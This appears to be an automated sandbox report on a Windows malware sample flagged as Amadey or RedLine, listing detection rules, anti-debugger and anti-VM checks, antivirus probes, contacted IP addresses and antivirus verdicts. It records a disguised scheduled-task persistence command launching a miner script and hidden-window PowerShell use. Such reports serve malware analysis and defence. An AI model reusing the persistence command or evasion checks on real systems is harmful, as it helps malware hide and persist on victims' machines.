description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Queries for potentially installed applications (3 events)

Time & API	Arguments	Return
RegOpenKeyExW April 21, 2025, 10 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d} base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}	2
RegOpenKeyExW April 21, 2025, 10 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired	2
RegOpenKeyExW April 21, 2025, 10 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d} base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}	2

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	net session
cmdline	schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Communicates with host for which no DNS query was performed (3 events)

host	185.215.113.41
host	185.215.113.59
host	193.233.237.109

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 226 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 9:59 a.m.	class_name: OLLYDBG window_name:		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 21, 2025, 10 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file	C:\Windows\Tasks\namez.job
cmdline	schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1228 resumed a thread in remote process 2964
Process injection	Process 2508 resumed a thread in remote process 1552
Process injection	Process 2508 resumed a thread in remote process 200
NtResumeThread April 21, 2025, 10 a.m.	thread_handle: 0x00000138 suspend_count: 0 process_identifier: 2964	1	0	0
NtResumeThread April 21, 2025, 9:53 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 1552	1	0	0
NtResumeThread April 21, 2025, 9:53 a.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 200	1	0	0

Creates a suspicious Powershell process (1 event)

option

-windowstyle hidden

value

Attempts to execute command with a hidden window

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 14 24 89 0c 24 89 exception.symbol: 2m8357+0x1f3062 exception.instruction: in eax, dx exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2044002 exception.address: 0x1133062 registers.esp: 3800404 registers.edi: 1259 registers.eax: 1447909480 registers.ebp: 4006408212 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 18017821 registers.ecx: 20	1	0	0

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W32.AIDetectMalware
MicroWorld-eScan	Gen:Variant.Doina.48214
CAT-QuickHeal	Trojandownloader.Deyma
Skyhigh	BehavesLike.Win32.Lockbit.vc
ALYac	Gen:Variant.Doina.48214
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
K7GW	Trojan ( 005aad751 )
K7AntiVirus	Trojan ( 005aad751 )
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
NANO-Antivirus	Trojan.Win32.Deyma.kwwbbz
Rising	Trojan.Agent!1.12B48 (CLASSIC)
F-Secure	Trojan.TR/Redcap.tclid
DrWeb	Trojan.Packed2.48355
VIPRE	Gen:Variant.Doina.48214
TrendMicro	Trojan.Win32.AMADEY.YXFDOZ
Trapmine	malicious.moderate.ml.score
Sophos	Troj/Amadey-O
SentinelOne	Static AI - Malicious SFX
Google	Detected
Avira	TR/Redcap.tclid
Antiy-AVL	Trojan[Downloader]/Win32.Deyma
Kingsoft	malware.kb.a.881
Gridinsoft	Spy.Win32.Redline.lu!heur
Microsoft	Trojan:Win32/Multiverze!rfn
ZoneAlarm	Troj/Amadey-O
Varist	W32/Kryptik.JKR.gen!Eldorado
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.3966811931
Ikarus	Trojan.MSIL.Disabler
Zoner	Probably Heur.ExeHeaderL
TrendMicro-HouseCall	Trojan.Win32.VSX.PE04C9V
Tencent	Malware.Win32.Gencirc.146b1fd4
huorong	Trojan/Generic!23958BC2A306C122
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Amadey.A!tr.dldr

download.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All